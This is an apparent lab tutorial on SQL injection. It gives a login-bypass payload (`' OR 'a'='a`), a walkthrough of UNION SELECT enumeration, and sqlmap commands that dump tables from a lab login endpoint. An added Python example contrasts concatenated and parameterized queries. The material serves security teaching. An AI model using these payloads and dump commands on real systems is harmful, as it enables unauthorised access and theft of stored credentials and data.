# Hacking SQL

## Things to look for:

* URL params that look like they feed requests
* Any form that touches a database
* Settings and experience-based items that can be edited
* Header items like User-Agents that might get stored in the DB
* Fuzz characters: `' " # --  , SELECT UNION`

## Tools to help:

* MSF SQL enumeration scripts
* sqlmap, a fully featured SQL enumeration/injection tool

### Impact:

* Dump the database
* Read the file system
* Run OS commands
* Create Admin login
* Install Shells

### Basic Commands:

The table dump / login bypass payload: `' OR 'a'='a`

### URL injection:

Testing control and output. Here an id of 9999 returns only the page frame with no record in it.

![](/files/-Mcqr9ZXWgZ0kMOjnH-W)

Now we use an existing id and we try both a true statement and a false statement.

True:

![](/files/-McqrCNCN7EBxg4RG6KF)

False:

![](/files/Y7tBdwjDG8NsBngFlkrp)

Now we add our UNION SELECT and keep incrementing the number of NULLs until we get a true statement back.

![](/files/SNzG6RRWt1thOmj15QL2)

Now we check the type of each NULL column by replacing it with either a number or a 'string', to see which type is enforced. Once we have our types we can switch back to ID 9999 so that our injected entries are the only ones shown.

![](/files/p0fHcoHLt1Wmp2YxBrsN)

Now we first try `@@version` in a column where we have a string, and then look up the pentest monkey SQL injection cheat sheet commands for that database version.

![](/files/TYTopfBmEYW9MEkD2oQM)

Here we test the current-user query to get the DB user:

![](/files/BX9wuXH9eGDiqSJMJda7)

![](/files/NxdFPNTKwRfolslP977u)

Next we try the list-user-table query, which needs some slight edits. (We could have queried for the table name, but it was already known.)

![](/files/xYuJ6MzThYO6UZ9bAs3l)

![](/files/ICWzYwrKLy8acRWjpdVV)

This returns the first user in the table. We could add a WHERE clause and enumerate the users one at a time, but we are better off using sqlmap.

## Authentication bypass:

If there is a login portal, sign in (or attempt to) and send the traffic to Burp. From the captured request you can map the login and use sqlmap to fuzz for injectable parameters.

![login request](/files/-MeSdCPKgS5XCyyTcBF6)

{% tabs %}
{% tab title="Method 1 (GET)" %}

```bash
sqlmap -u "http://3.lab.auth.site/ajax.php?fun=login&username=david&password=test" --keep-alive
```

{% endtab %}

{% tab title="Method 2 (POST)" %}

```bash
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" --keep-alive
```

{% endtab %}
{% endtabs %}

In method 1 we use the GET request exactly as we see it being generated from ajax.php. This may not always work, so we also want to try POSTing the same parameter data, and to try injecting at other data points such as the User-Agent and Referer headers.

For this example, the method 2 POST of the data works and gets SQLi on `username`, likely bypassing a security mechanism that is set up to look only at GETs.

![](/files/-MeSho8HmgVRrMVW6VCP)

We can now specify the vulnerable parameter and what we want to dump from it:

{% tabs %}
{% tab title="Exploit + Dump" %}

```bash
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -p username --dbs --tables --columns --keep-alive
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -D ratingAgency3 -T analyst --dump --keep-alive
```

{% endtab %}
{% endtabs %}
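Why the `' OR 'a'='a` payload from Basic Commands (and the injectable `username` field found above) works, shown as an added example that is not part of the original page: a login query built by string concatenation beside the same query with bound parameters. The `analyst` table, its columns and the stored credentials are assumptions stood up in an in-memory SQLite database, not the lab's real schema.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the login table behind ajax.php (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE analyst (username TEXT, password TEXT)")
    conn.execute("INSERT INTO analyst VALUES ('david', 'correct-horse')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: whatever the user typed becomes part of the SQL text."""
    return ("SELECT username FROM analyst WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Returns the matched username, or None. Injectable through both fields."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the input is only ever compared as data."""
    sql = "SELECT username FROM analyst WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 'a'='a"  # the payload listed under Basic Commands
    # The concatenated query becomes:
    #   ... WHERE username = 'david' AND password = '' OR 'a'='a'
    # AND binds tighter than OR, so the trailing 'a'='a' makes every row match.
    print(build_vulnerable_query("david", payload))
    print("vulnerable:", login_vulnerable(db, "david", payload))  # david
    print("parameterized:", login_safe(db, "david", payload))     # None
```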

### Loot:

![](/files/-MeSk13-FaIJRBGJTE-x)

![](/files/-MeSkleofOB6kfZ9r3lt)

